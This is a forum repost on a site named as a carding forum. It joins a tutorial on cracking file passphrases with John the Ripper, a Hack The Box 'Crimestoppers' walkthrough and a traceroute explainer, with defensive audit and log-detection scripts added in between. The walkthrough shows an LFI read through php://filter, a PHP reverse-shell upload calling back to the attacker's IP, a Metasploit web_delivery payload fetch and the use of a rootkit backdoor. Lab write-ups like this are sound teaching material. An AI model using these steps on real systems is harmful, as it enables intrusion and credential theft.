Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Beginners Guide for John the Ripper (Part 2) - Printable Version

[Guide] How to Beginners Guide for John the Ripper (Part 2) - NINZA - 05-14-2020

We covered the basic information on John the Ripper in our previous article. In this article, we will use John the Ripper to crack the password hashes of several file formats, such as zip, rar, pdf and more.

To crack these password hashes, we use helper utilities that extract the password hash from the locked file. Some of them ship with John and others have to be downloaded separately. The ones that come with John can be listed with the following command.

locate *2john


As you can see, the following utilities are available; we will demonstrate some of them here.

[Image: 1.png?w=687&ssl=1]

Cracking the SSH Password Hash

John the Ripper can crack the passphrase of an RSA SSH private key. To test this, we first have to generate a new private key, using the “ssh-keygen” utility that comes with ssh.

ssh-keygen


[Image: 2.png?w=687&ssl=1]

After it starts, it asks for the location at which to store the public/private RSA key pair. You can use any location or leave it at the default.

It then asks for a passphrase; after entering it a second time, the RSA private key is generated (refer to the image).

When you will try to open the file, you will be greeted by the following prompt.

[Image: 3.png?w=687&ssl=1]

John cannot crack this key directly; first we have to convert it into a hash format John understands, using the John utility “ssh2john”.

Syntax: ssh2john [location of key]

ssh2john /home/pavan/.ssh/id_rsa > id_rsa.txt


[Image: 4.png?w=687&ssl=1]

You can see that we converted the key into a crackable hash and saved it into a text file named id_rsa.txt.

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt


Great! We have successfully cracked the passphrase protecting the private SSH key: it is “password123”.

[Image: 5.png?w=687&ssl=1]
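The passphrase fell quickly because a short dictionary word protected the key and the legacy PEM format derives the encryption key from the passphrase with a single MD5 pass. A defender’s counterpart to the steps above is an inventory check: which private keys on a host are encrypted at all, in which format, and with how many KDF rounds. The following Python script is an added example, not part of the original article. It reads the two on-disk forms ssh-keygen writes, the legacy PEM form (encryption signalled by Proc-Type/DEK-Info headers) and the openssh-key-v1 form (cipher name, KDF name and bcrypt rounds in the header). The key texts inside it are constructed fixtures; the public/private key sections that follow the header are omitted because the audit never reads them.

```python
import base64
import struct
from typing import Dict, Optional

# Constructed sample inputs (not from the article). Bodies are placeholders.
LEGACY_PEM_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAAplaceholderbodyconstructed
-----END RSA PRIVATE KEY-----
"""

LEGACY_PEM_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
AAAAplaceholderbodyconstructed
-----END RSA PRIVATE KEY-----
"""

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def build_openssh_v1_header(ciphername: str, kdfname: str, rounds: int = 16) -> str:
    """Test fixture (constructed): the leading fields of an openssh-key-v1 blob.
    The real file continues with the key sections; the audit only needs the header."""
    kdfoptions = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdfname == "bcrypt" else b""
    blob = (MAGIC + _ssh_string(ciphername.encode()) + _ssh_string(kdfname.encode())
            + _ssh_string(kdfoptions) + struct.pack(">I", 1))   # nkeys = 1
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4: off + 4 + n], off + 4 + n


def audit_private_key(text: str) -> Dict[str, object]:
    """Report whether a private key is encrypted and how its passphrase is stretched."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        raise ValueError("not a PEM-style private key")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds: Optional[int] = None
        if kdf == b"bcrypt":
            _salt, o2 = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o2)
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: encryption is signalled by headers; the key derivation is a single
    # MD5 pass over the passphrase, which is why wordlist attacks against it are cheap.
    headers = dict(ln.split(":", 1) for ln in lines[1:-1] if ":" in ln)
    encrypted = headers.get("Proc-Type", "").strip() == "4,ENCRYPTED"
    cipher = headers.get("DEK-Info", "").strip().split(",")[0] if encrypted else "none"
    return {"format": "legacy-pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5-single-pass" if encrypted else "none", "rounds": 1 if encrypted else None}


def weakness(report: Dict[str, object]) -> str:
    """One-line verdict an inventory script would attach to each key."""
    if not report["encrypted"]:
        return "unencrypted: anyone who can read the file owns the key"
    if report["format"] == "legacy-pem":
        return "legacy PEM KDF: regenerate with 'ssh-keygen -o -a 100' and a long passphrase"
    if report["rounds"] is not None and report["rounds"] < 16:
        return "low bcrypt round count"
    return "ok: bcrypt KDF; resistance now depends on passphrase strength"


if __name__ == "__main__":
    for name, key in [("legacy-enc", LEGACY_PEM_ENCRYPTED), ("legacy-plain", LEGACY_PEM_PLAIN),
                      ("v1-bcrypt", build_openssh_v1_header("aes256-ctr", "bcrypt", 100)),
                      ("v1-plain", build_openssh_v1_header("none", "none"))]:
        print(name, weakness(audit_private_key(key)))
```

Run it over every id_* file under the .ssh directories on a host and the output is the list of keys that a wordlist such as rockyou would threaten first. The `-o` flag has been the default since OpenSSH 7.8, so keys generated with a current ssh-keygen already carry the bcrypt header; older keys still on disk are the ones worth regenerating.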

Cracking the KeePass2 Password Hash

John the Ripper can crack the key of a KeePass2 database. To test this, we first have to create a new database, using the utility “kpcli”.

kpcli


[Image: 6.png?w=687&ssl=1]

Now we create a database file using the “save as” command, naming it ignite.kdb and entering a passcode to secure it.

When you will try to open the file, you will be greeted by the following prompt.

[Image: 7.png?w=687&ssl=1]

John cannot crack this key directly; first we have to convert its format, using the John utility “keepass2john”.

Syntax: keepass2john [location of key]

keepass2john ignite.kdb > crack.txt


[Image: 8.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the database: it is “12345678”.

[Image: 9.png?w=687&ssl=1]

Cracking the RAR Password Hash

Next we will crack some compressed files. For that we need a file to compress, so let’s create one with the echo command as shown in the screenshot.

You can see that we created file.txt, which we will use to build the compressed archives.

echo hackingarticles.in > file.txt


[Image: 10.png?w=687&ssl=1]

John the Ripper can crack RAR file passwords. To test this, let’s first create an encrypted rar archive.

rar a -hpabc123 file.rar file.txt


[Image: 11.png?w=687&ssl=1]

  • a = Add files to archive
  • hp[password] = Encrypt both file data and headers

This will compress and encrypt our file.txt into file.rar. So, when you try to open the file, you will be greeted by the following prompt.

[Image: 12.png?w=687&ssl=1]

John cannot crack this archive directly; first we have to convert its format, using the John utility “rar2john”.

Syntax: rar2john [location of key]

rar2john file.rar > crack.txt


[Image: 13.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the archive: it is “abc123”.

[Image: 14.png?w=687&ssl=1]

Cracking the ZIP Password Hash

John the Ripper can crack ZIP file passwords. To test this, let’s first create an encrypted zip archive.

zip -er file.zip file.txt


[Image: 15.png?w=687&ssl=1]

  • e = Encrypt
  • r = Recurse into directories

This will compress and encrypt our file.txt into file.zip. So, when you try to open the file, you will be greeted by the following prompt.

[Image: 16.png?w=687&ssl=1]

John cannot crack this archive directly; first we have to convert its format, using the John utility “zip2john”.

Syntax: zip2john [location of key]

zip2john file.zip > crack.txt


[Image: 17.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the archive: it is “654321”.

[Image: 18.png?w=687&ssl=1]
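How cheaply an archive password can be attacked offline depends on the scheme the archiver used, and that is recorded in the archive headers: Info-ZIP’s zip -e applies the legacy ZipCrypto stream cipher, while AES-protected entries (WinZip AE-x) carry compression method 99 and an encryption flag. The following Python script is an added example, not from the article, that reads those fields from the central directory so an administrator can audit archives before they are shared or archived. `simulate_encrypted_headers` is a constructed test fixture: it only patches the header bits of an unencrypted archive so the audit has something to classify, and does not produce a real encrypted zip.

```python
import io
import struct
import zipfile
from typing import Dict, List

ZIP_FLAG_ENCRYPTED = 0x0001      # general-purpose flag bit 0
ZIP_METHOD_AES = 99              # WinZip AE-x marker in the compression-method field


def audit_zip(data: bytes) -> List[Dict[str, object]]:
    """Per entry: is it encrypted, and with which scheme (none / zipcrypto / aes)."""
    rows = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():          # populated from the central directory
            encrypted = bool(info.flag_bits & ZIP_FLAG_ENCRYPTED)
            if not encrypted:
                scheme = "none"
            elif info.compress_type == ZIP_METHOD_AES:
                scheme = "aes"               # strong cipher; passphrase strength is what matters
            else:
                scheme = "zipcrypto"         # legacy PKWARE stream cipher, what 'zip -e' writes
            rows.append({"name": info.filename, "encrypted": encrypted, "scheme": scheme})
    return rows


def make_zip(name: str, payload: bytes) -> bytes:
    """Constructed unencrypted archive built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def simulate_encrypted_headers(data: bytes, aes: bool = False) -> bytes:
    """Test fixture only: set the encryption flag (and optionally the AES method) in every
    central-directory header. The entry data itself is NOT encrypted by this."""
    buf = bytearray(data)
    off = buf.find(b"PK\x01\x02")            # central directory file header signature
    while off != -1:
        (flags,) = struct.unpack_from("<H", buf, off + 8)      # general-purpose flags
        struct.pack_into("<H", buf, off + 8, flags | ZIP_FLAG_ENCRYPTED)
        if aes:
            struct.pack_into("<H", buf, off + 10, ZIP_METHOD_AES)  # compression method
        off = buf.find(b"PK\x01\x02", off + 4)
    return bytes(buf)


def summarise(rows: List[Dict[str, object]]) -> str:
    """Worst scheme in the archive, the value a policy check would act on."""
    order = {"none": 0, "zipcrypto": 1, "aes": 2}
    return min((r["scheme"] for r in rows), key=lambda s: order[s], default="empty")


if __name__ == "__main__":
    plain = make_zip("file.txt", b"hackingarticles.in\n")
    for label, blob in [("plain", plain),
                        ("zipcrypto", simulate_encrypted_headers(plain)),
                        ("aes", simulate_encrypted_headers(plain, aes=True))]:
        print(label, audit_zip(blob), "->", summarise(audit_zip(blob)))
```

An archive whose worst entry is “none” leaks its contents outright, and one at “zipcrypto” is the case the zip2john step above targets; only “aes” entries shift the problem entirely onto passphrase strength.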

Cracking the 7-Zip Password Hash

John the Ripper can crack 7-Zip file passwords. To test this, let’s first create an encrypted 7z archive.

7z a -mhe file.7z file.txt -p"password"


[Image: 19.png?w=687&ssl=1]

  • a = Add files to archive
  • m = Set compression Method
  • h = Calculate hash values for files
  • e = Encrypt file
  • p = set Password

This will compress and encrypt our file.txt into file.7z. So, when you try to open the file, you will be greeted by the following prompt.

[Image: 20.png?w=687&ssl=1]

John cannot crack this archive directly; first we have to convert its format, using the John utility “7z2john”. This is not an inbuilt utility; it can be downloaded from [To see content please register here].

Syntax: 7z2john [location of key]

python 7z2john.py file.7z > crack.txt


[Image: 21.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the archive: it is “password”.

[Image: 22.png?w=687&ssl=1]

Cracking the PDF Password Hash

John the Ripper can crack PDF file passwords. You can encrypt your pdf online using [To see content please register here]. This produces a password-protected file.pdf, and when you try to open it you will be greeted by the following prompt.


[Image: 23.png?w=687&ssl=1]

John cannot crack this file directly; first we have to convert its format, using the John utility “pdf2john”. This is not an inbuilt utility; it can be downloaded from [To see content please register here].


Syntax: pdf2john [location of key]

python pdf2john.py file.pdf > crack.txt


[Image: 24.png?w=687&ssl=1]

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the PDF: it is “password123”.

[Image: 25.png?w=687&ssl=1]

Cracking the PuTTY Password Hash

John the Ripper can crack the passphrase of a PuTTY RSA private key. To test this, we first have to generate a new private key, using the “PuTTY Key Generator” utility that comes with PuTTY.

[Image: 29.PNG?w=687&ssl=1]

Click on “Generate”. After the key has been generated, we get a window where we input the key passphrase as shown in the image.

[Image: 30.PNG?w=687&ssl=1]

After entering the passphrase, click on Save private key to get the private key in the form of a .ppk file.

After generating the key, transfer this .ppk file to Kali Linux.

John cannot crack this key directly; first we have to convert its format, using the John utility “putty2john”.

Syntax: putty2john [location of key]

putty2john file.ppk > crack.txt


[Image: 31.png?w=687&ssl=1]

You can see that we converted the key to a crackable hash and then entered it into a text file named crack.txt.

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the private PuTTY key: it is “password”.

[Image: 32.png?w=687&ssl=1]

Cracking the “Password Safe” Password Hash

John the Ripper can crack the key of the Password Safe software. To test this, we first have to create a new safe. To do this we install Password Safe on our Windows 10 system.

[Image: 33.PNG?w=687&ssl=1]

To create a new safe, click on “New”.

[Image: 34.PNG?w=687&ssl=1]

In this prompt, check the Show Combination box, then enter the passphrase you want to use. This will generate a .psafe3 file.

After generating it, transfer this .psafe3 file to Kali Linux.

John cannot crack this file directly; first we have to convert its format, using the John utility “pwsafe2john”.

Syntax: pwsafe2john [location of key]

pwsafe2john ignite.psafe3 > crack.txt


[Image: 35.png?w=687&ssl=1]

You can see that we converted the key to a crackable hash and then entered it into a text file named crack.txt.

Now let’s use John the Ripper to crack this hash.

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt


Great! We have successfully cracked the passphrase protecting the pwsafe file: it is “password123”.

[Image: 36.png?w=687&ssl=1]



Today we are sharing our experience of solving a new CTF challenge: Crimestoppers from Hack The Box. Solving this lab is not that easy; all you need is your penetration-testing skill.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Penetrating Methodology
  • Network Scanning
  • Enumeration
  • Exploiting Web Applications
  • Capture user.txt
  • Privilege Escalation
  • Capture root.txt Flag
Let’s Begin!!

Network Scanning

These labs are only available online, so they have a static IP. Crimestoppers has IP 10.10.10.80.

As we know, the initial stage is enumeration; therefore we use an nmap aggressive scan to gather information on the target machine and its running services.

nmap -A 10.10.10.80


[Image: 1.png?w=687&ssl=1]

Knowing that port 80 was open on the victim’s machine, we opened its IP in the browser and the page shown below appeared. Here we can see that it has two pages, home and upload, but we didn’t find anything suspicious.

[Image: 2.png?w=687&ssl=1]

Enumeration

Next, we use the dirb tool in Kali to enumerate directories and found some important ones, such as [To see content please register here], which we then explored in the web browser.


[Image: 3.1.png?w=687&ssl=1]

At upload, you can submit any comment as a Tip, in order to provide some information. So we tried to upload malicious code here but failed each time.

If you observe the URL http://10.10.10.80/?op=upload you will realize that it looks like an LFI.

[Image: 3.png?w=687&ssl=1]

But it was not that easy to extract information by exploiting the LFI with ../etc/passwd, so with a little more effort and help from my previous [To see content please register here], we used the curl command to read the file’s contents with the PHP base64-encode filter.


curl [To see content please register here]=php://filter/convert.base64-encode/resource=upload


As a result, it returns base64-encoded text, which we need to decode.

[Image: 5.png?w=687&ssl=1]

To decode the base64 text, follow the syntax below; we found a PHP script pointing toward some kind of token and a secretname, which was a link into the uploads directory.

Syntax: echo BASE64TEXT | base64 -d

[Image: 6.png?w=687&ssl=1]

After a lot of struggle, we finally uploaded our PHP backdoor with the help of Burp Suite. Follow the given steps to upload the PHP web shell.

Open php-reverse-shell.php, which comes with Kali Linux at /usr/share/webshells/php, set the ATTACKER’s IP and save the file on the desktop. Here we renamed it shell.php and compressed it.

zip -0 shell.zip shell.php


[Image: 8.png?w=687&ssl=1]

Exploiting Web Application

To capture the request in the web browser, enter the information for Tip and name, then turn on Burp Suite and click Send Tip.

[Image: 9.png?w=687&ssl=1]

Now, in order to upload the content of our PHP backdoor through Burp, select the string “shell” in the name=tip field as shown below.

[Image: 10.png?w=687&ssl=1]

Then open the PHP file and paste its content in place of “shell”.

[Image: 11.png?w=687&ssl=1]

As you can observe, we have successfully uploaded our malicious PHP content here.

[Image: 12.png?w=687&ssl=1]

Now forward the intercepted request and you will get the secretname of the uploaded file, as highlighted; copy it. Forward the request again to get the success.txt message, and then forward it one more time.

[Image: 13.png?w=687&ssl=1]

Do not forget to launch netcat for reverse connection before executing your uploaded file.

nc -lvp 1234


Now open the browser and request the following URL, which contains the secretname of the uploaded file (the PHP backdoor); you will get a reverse connection in your netcat session.

[To see content please register here]
python -c 'import pty; pty.spawn("/bin/sh")'


[Image: 14.png?w=687&ssl=1]

Because we love to work with a meterpreter session, we used Metasploit’s web_delivery module to generate malicious Python code as shown.

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
msf exploit(multi/script/web_delivery) > exploit


[Image: 15.png?w=687&ssl=1]

Paste the copied code into the netcat session, which will provide a meterpreter session inside the Metasploit framework.

[Image: 16.png?w=687&ssl=1]

HURRAYYYY!!! We got our meterpreter session, now let’s grab the user.txt file first.

Inside /home/dom I found the user.txt file and used the cat command to read it.

cd home
ls
cd dom
ls
cat user.txt


Great!! We got our 1st flag successfully.

[Image: 17.png?w=687&ssl=1]

Privilege Escalation

Now we need to find the root.txt file to finish this challenge, and believe me, it was not easy unless you find the hint hidden by the author. We tried every possible method of escalating privileges to gain root access, but this box was quite different from previous experience.

After more enumeration we found “36jinndk.default” inside /home/dom/.thunderbird, which was an encrypted Thunderbird profile, so we downloaded it to our local system.

meterpreter> download 36jinndk.default /root/Desktop/36


[Image: 18.png?w=687&ssl=1]

Since it was an encrypted Thunderbird profile, with the help of Google we found a Python script for decrypting it at this link: [To see content please register here]

With the help of the following command, we found the password: Gummer59.

python firefox_decrypt.py /root/Desktop/36


[Image: 19.png?w=687&ssl=1]

We used this password to switch to the user dom with the following command, then moved into the crimestoppers.htb directory, which looks like his mailbox directory, where we found many files such as INBOX.

su dom
Password:
cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb


[Image: 20.png?w=687&ssl=1]

First we looked into INBOX for any hint about root.txt but found nothing related to the root flag; similarly we opened the other files but didn’t find anything.

[Image: 21.png?w=687&ssl=1]

At last, we opened Drafts-1 and read the following line, which looks like a hint for root access, together with its execution method:

“I don’t trust them and run rkhunter, it reported that there a rootkit installed called:apache_modrootme backdoor”

[Image: 22.png?w=687&ssl=1]

So we explored the following path and found the access.log.2.gz file; since it was a compressed file, it was better to copy it into /tmp for the next steps.

cd /var/log/apache2
cp access.log.2.gz /tmp


Now let’s move into /tmp and extract the copied file with gunzip.

gunzip access.log.2.gz
ls
cat access.log.2


In the log you can observe a command “FunSociety” that was executed several times.

[Image: 23.png?w=687&ssl=1]

As per the message read from Drafts-1, we connect with netcat to localhost on port 80 and get root access with the following commands.

nc localhost 80
get FunSociety
get FunSociety
id


Now let’s get the root.txt and finish this task.

cd /root
cat root.txt


BOOOOOM!!!! We hit the goal and completed both tasks.

[Image: 24.png?w=687&ssl=1]
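Seen from the defender’s side, the steps of this walkthrough left traces in the Apache access log that a log monitor can catch before an rkhunter run does: the php://filter wrapper used to read the source of the upload page, the ../ traversal attempts against the op parameter, and a request line that is not HTTP at all (the lowercase “get FunSociety” command the mod_rootme backdoor answers to). The following Python script is an added example, not part of the original write-up. It parses combined-format log lines and flags those three patterns; the log lines inside it are constructed for the demonstration (invented hosts, times and sizes), not taken from the box.

```python
import re
from typing import Dict, List, Optional

# Constructed combined-format log lines (not the box's real log).
SAMPLE_LOG = [
    '10.10.14.25 - - [18/May/2020:10:12:01 +0000] "GET /?op=upload HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '10.10.14.25 - - [18/May/2020:10:13:44 +0000] "GET /?op=php://filter/convert.base64-encode/resource=upload HTTP/1.1" 200 4096 "-" "curl/7.68.0"',
    '10.10.14.25 - - [18/May/2020:10:14:02 +0000] "GET /?op=../../../../etc/passwd HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '127.0.0.1 - - [18/May/2020:10:20:17 +0000] "get FunSociety" 400 0 "-" "-"',
    '10.10.14.25 - - [18/May/2020:10:21:00 +0000] "POST /?op=upload HTTP/1.1" 302 0 "http://crimestoppers.htb/?op=upload" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')
HTTP_METHODS = {"GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "PATCH", "CONNECT", "TRACE"}
# PHP stream wrappers that never belong inside an include/path parameter.
WRAPPER_RE = re.compile(r'(?i)\b(php|data|expect|phar|zip|glob|file)://')
# Plain and URL-encoded dot-dot-slash, either slash direction.
TRAVERSAL_RE = re.compile(r'(\.\.[/\\]|\.\.%2f|%2e%2e[/\\]|%2e%2e%2f)', re.I)


def analyse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line and attach the findings that apply to it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("req")
    parts = req.split(" ")
    method, target = parts[0], (parts[1] if len(parts) > 1 else "")
    findings: List[str] = []
    if method not in HTTP_METHODS:
        # Apache logs the raw request line even when it is not valid HTTP; a lowercase
        # verb with no protocol version is the shape of a command to a backdoor module.
        findings.append("non-HTTP request line")
    if WRAPPER_RE.search(target):
        findings.append("php stream wrapper in parameter")
    if TRAVERSAL_RE.search(target):
        findings.append("path traversal sequence")
    return {"ip": m.group("ip"), "time": m.group("ts"), "request": req,
            "status": int(m.group("status")), "findings": findings}


def scan(lines) -> List[Dict[str, object]]:
    """Keep only the records that carry at least one finding."""
    out = []
    for line in lines:
        rec = analyse_line(line)
        if rec and rec["findings"]:
            out.append(rec)
    return out


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(f'{rec["time"]} {rec["ip"]} {rec["status"]} "{rec["request"]}" -> {", ".join(rec["findings"])}')
```

Point `scan` at the decompressed access.log.* files (the same ones the walkthrough reads from /var/log/apache2) and the wrapper and traversal hits mark the reconnaissance phase, while repeated non-HTTP request lines from localhost are the signature of the rootkit being driven after the compromise.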



In this post, we are going to discuss how traceroute works with UDP, ICMP and TCP packets, with the help of Wireshark.

Traceroute or Tracert: a command-line network diagnostic tool, called traceroute on Unix-like systems and tracert on Windows. It traces the path of a packet from the source machine to an Internet host such as Google.com, measuring the average time taken for each hop. Traceroute sends UDP packets to the destination and takes advantage of ICMP’s error-reporting messages, Destination Unreachable and Time Exceeded.

TTL: The time-to-live value, also known as the hop limit, is a mechanism that limits the lifespan or lifetime of data in a computer or network.

Hop: A hop is one portion of the path between source and destination. Data packets pass through bridges, routers, and gateways as they travel between source and destination. On the internet, before the data reaches its final destination, it goes through several routers and a hop occurs when an incoming packet is forwarded to the next router.

The asterisk (*): denotes a probe timeout, meaning that the router at that hop did not respond to the probe sent by the source, typically because of a firewall filter.

Working of Traceroute

[Image: 0.png?w=687&ssl=1]

Read the steps below:
  • Traceroute sends a UDP packet with TTL = 1 from the source towards the destination.
  • When the first router receives the UDP packet it reduces the TTL by 1 (1-1=0), drops the packet and sends an ICMP “Time Exceeded” message to the source. Traceroute thus records the router’s address and the round-trip time.
    The “TTL time exceeded” ICMP message is sent once the TTL of a UDP packet reaches zero. Under normal conditions a network does not have a diameter large enough to drive the TTL to 0; that happens when there is a routing loop. In that case, as the packet is sent back and forth between the looping points, the TTL keeps being decremented until it becomes zero, and finally the source receives the ICMP error message sent by the router.
  • The source then sends two more packets in the same way, to get an average round-trip time, and then the TTL is set so that it reaches zero at the 2nd router, which again responds with an ICMP Time Exceeded message.
  • Traceroute keeps doing this, recording the IP address and name of every router, until the UDP packets reach the destination address. Once they reach the destination, no Time Exceeded ICMP message is sent back to the source.
  • Since traceroute sends the UDP packets to a random (unused) port, the destination machine drops the packet and sends a different ICMP error message, Destination Unreachable, to the source, which indicates that the UDP packets have reached the destination address.

Tracert with Wireshark

As discussed above, tracert is the CLI utility on Windows systems for tracing the path of a packet from source to destination. With the following command, we can observe the path a packet travels to reach Google DNS.

Syntax: tracert [options] Host IP

tracert 8.8.8.8


or

tracert -d 8.8.8.8


Tracert produces a list of each hop, recording the IP of every router traversed between source and destination along with the average round-trip time. Here hop 22 is the destination, i.e. Google DNS.

In order to notice the activity of traceroute, we have turned on Wireshark in the background.

Note: the hop count reported by tracert can vary between runs but does not go beyond 30 hops, because that is the maximum hop limit.

[Image: 1.png?w=687&ssl=1]

In Wireshark we notice the following points:
  • An ICMP echo request packet is used instead of UDP to send the DNS query.
  • The packet first goes from the source 192.168.1.101 to the first router 192.168.1.1 as an ICMP echo request with TTL=1.
  • The router drops that packet and sends an ICMP Time Exceeded error message to the source.
  • All this happens 3 times before the source machine sends the next packet with the TTL incremented by 1, i.e. TTL=2.
[Image: 2.png?w=687&ssl=1]

From this image we can observe the ICMP echo reply message sent from 8.8.8.8 (destination) to 192.168.1.101 (source) for TTL 22.

[Image: 3.png?w=687&ssl=1]

Traceroute with Wireshark (via UDP packets)

As discussed above, traceroute is the utility on Unix-like systems for tracing the path of a packet from source to destination. With the following command, we can observe the path a packet travels to reach Google DNS.

Syntax: traceroute [options] Host IP

traceroute 8.8.8.8


[Image: 4.png?w=687&ssl=1]

Traceroute produces a list of each hop, recording the IP of every router between source and destination along with the average round-trip time. Here hop 21 is the destination, i.e. Google DNS.

In order to notice the activity of traceroute, we have turned on Wireshark in the background.

Note: the hop count reported by traceroute can vary between runs but does not go beyond 30 hops, because that is the maximum hop limit.

In Wireshark we notice the following points:
  • A UDP packet with a 32-bit payload is used to send the DNS query.
  • The packet first goes from the source 192.168.1.101 to the first router 192.168.1.1 with TTL=1.
  • The router drops that packet and sends an ICMP Time Exceeded error message to the source.
  • All this happens 3 times before the source sends the next packet with the TTL incremented by 1, i.e. TTL=2.
[Image: 5.png?w=687&ssl=1]

In tracert we saw that each TTL value is probed 3 times between the source and the first router; the same technique is followed with UDP. To demonstrate this we look at UDP packets 5, 6, 7 and 8 in turn.

In the 5th packet, we observe the UDP packet sent by the source (192.168.1.102) to destination 8.8.8.8 on port 33435, counted as Hop #1, attempt #1.

[Image: 6.png?w=687&ssl=1]

In the 6th packet, we observe the UDP packet sent by the source (192.168.1.102) to destination 8.8.8.8 on port 33436, counted as Hop #1, attempt #2.

[Image: 7.png?w=687&ssl=1]

Similarly, in the 7th packet, we observe the UDP packet sent by the source (192.168.1.102) to destination 8.8.8.8 on port 33437, counted as Hop #1, attempt #3.

[Image: 8.png?w=687&ssl=1]

In the 8th packet, we observe the UDP packet sent by the source (192.168.1.102) to destination 8.8.8.8 on port 33436, counted as Hop #2, attempt #1, and the process repeats until the destination is reached.

[Image: 9.png?w=687&ssl=1]

In packet 79 we observe that the last hop captured was hop #10, attempt #3, when the UDP packet was sent by the source (192.168.1.102) to destination 8.8.8.8 on port 33464; no Time Exceeded ICMP message is sent back to the source after this.

[Image: 10.png?w=687&ssl=1]

As a result, the source finally received an ICMP Destination Port Unreachable message, which means our UDP packet reached the destination address.

Finally, from the image below we observed the following:
  • The source sent a DNS query to the router for the DNS lookup of 8.8.8.8.
  • The router sent the response to the source with the DNS name Google-Public-DNS-google.com.
[Image: 11.png?w=687&ssl=1]

Traceroute with Wireshark (via ICMP packets)

As you know, by default traceroute uses UDP packets, but with the -I option you can make it behave like tracert, which uses ICMP echo request packets.

traceroute -I 8.8.8.8


[Image: 12.png?w=687&ssl=1]

It produces a list of each hop, recording the IP of every router between source and destination along with the average round-trip time. Here hop 22 is the destination, i.e. Google DNS. To observe the activity of traceroute, we turned on Wireshark in the background.

In Wireshark we notice the following: the first ICMP echo request packet is sent to the first router with TTL 1, and the router sends back an ICMP Time Exceeded error message, following the same technique explained above under tracert with Wireshark.

Finally, from the image below we observed the following:
  • The ICMP echo reply message is sent from 8.8.8.8 (destination) to 192.168.1.101 (source) for TTL 22.
  • The source sent a DNS query to the router for the DNS lookup of 8.8.8.8.
  • The router sent the response to the source with the DNS name Google-Public-DNS-google.com.
[Image: 13.png?w=687&ssl=1]

Traceroute with Wireshark (via TCP packets)

As you know, by default traceroute uses UDP packets and relies on ICMP error messages for the responses, but with the -T option you can use TCP packets, which send SYN requests to port 80. This is most useful for diagnosing connection issues to a specific service, e.g. a web server.

tcptraceroute 8.8.8.8
or
traceroute -T 8.8.8.8


As we know, the maximum hop limit is 30, but here even at the 30th hop we didn’t get the desired output. TCP traceroute performs a half-open TCP connection and waits for a SYN/ACK packet from the destination until the last hop.

[Image: 14.png?w=687&ssl=1]

To observe the activity of TCP traceroute, we turned on Wireshark in the background, where we noticed that it works the same as UDP, except that SYN packets are used to send the requests to the destination. Tcptraceroute does not measure the time it takes to complete the three-way handshake, because that never occurs in this situation; it only measures the time from the initial SYN to the SYN/ACK.

Since Wireshark also didn’t see any SYN/ACK packet from the destination to the source, tcptraceroute did not record a destination response in its list. This is expected, as the tool is meant for diagnosing web servers, and the DNS server does not answer on port 80.

[Image: 15.png?w=687&ssl=1]

So let’s trace the path to Google.com and observe the behaviour of tcptraceroute, comparing the results and the TCP behaviour for the Google DNS server and the Google web server.

tcptraceroute google.com


Here we can clearly observe the destination machine’s response with SYN/ACK, and a complete entry recorded by traceroute.

[Image: 16.png?w=687&ssl=1]

